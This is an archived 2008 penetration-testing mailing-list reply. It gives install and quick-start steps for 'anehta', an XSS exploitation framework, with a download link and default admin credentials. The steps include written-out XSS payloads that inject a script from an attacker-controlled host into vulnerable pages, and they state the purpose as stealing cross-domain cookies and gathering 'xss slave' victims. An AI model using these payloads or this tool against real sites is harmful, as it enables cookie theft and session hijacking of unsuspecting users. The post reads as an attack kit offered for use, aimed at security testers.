Penetration Testing mailing list archives
Re: Exploiting XSS
From: xsp <xisigr () gmail com>
Date: Mon, 8 Dec 2008 09:21:20 +0800
=== Enviroment === 1. PHP4/5 (PHP5 is recommended) 2. Apache or IIS === Install & Configure === 1. Decompress all the files in a directory on your server 2. Make sure your directory has the write permission. 3. Modify $U as username and $P as password in "server/class/auth_Class.php" file. Default username is "admin" and default password is "123456". 4. If you want to send mail, modify "server/mail.php" file to your own mail server or mailbox. === Quick Start === 1. Login and turn to the Configure tab. 2. Input the "anehtaurl" as the url where your anehta is. For example: "http://www.a.com/anehta". 3. You should also input the boomerang src and boomerang target. boomerang src is usually the same page where you put your feed.js is. For example: boomerang src maybe: "http://www.b.com/xssed.html?param=<script src=http://www.a.com/anehta/feed.js></script>". boomerang target must be the page where you want to steal cross domain cookie. For example: boomerang target maybe: "http://www.alimafia.com/xssDemo.html#'><script src=http://www.a.com/anehta/feed.js></script><'". You can modify feed.js to cancel the xcookie module if you do not want to use boomerang. But you must always set boomerang src and target values when you modify in the configure tab. 4. After modified configure, simply load feed.js as a external script to where your xss page is. There is also a demo page in the directory which is "demo.html" 5. Refresh the admin.php, and you may see some changes if your xss slave coming. CODE: http://anehta.googlecode.com/files/anehta-v0.6.0fixed.zip DEMO: http://www.secwiki.com/anehta http://www.secwiki.com/anehta/demo.html -- xushaopei ------------------------------------------------------------------------ This list is sponsored by: Cenzic Security Trends Report from Cenzic Stay Ahead of the Hacker Curve! Get the latest Q2 2008 Trends Report now www.cenzic.com/landing/trends-report ------------------------------------------------------------------------
Current thread:
- Exploiting XSS Whitehat (Dec 03)
- RE: Exploiting XSS Baykal, Adnan (CSCIC) (Dec 03)
- Re: Exploiting XSS Anthony Cicalla (Dec 05)
- Re: Exploiting XSS NeZa (Dec 05)
- Re: Exploiting XSS Durga Prasad Adusumalli (Dec 05)
- Re: Exploiting XSS Danilo Nascimento (Dec 05)
- Re: Exploiting XSS Adriel T. Desautels (Dec 05)
- Message not available
- Re: Exploiting XSS Adriel T. Desautels (Dec 05)
- Re: Exploiting XSS Paul Melson (Dec 07)
- Re: Exploiting XSS Adriel T. Desautels (Dec 07)
- Re: Exploiting XSS xsp (Dec 07)
- Message not available
- RE: Exploiting XSS Baykal, Adnan (CSCIC) (Dec 03)
- <Possible follow-ups>
- Re: Exploiting XSS Ulisses Castro (thebug) (Dec 03)
- Re: Exploiting XSS anj (Dec 08)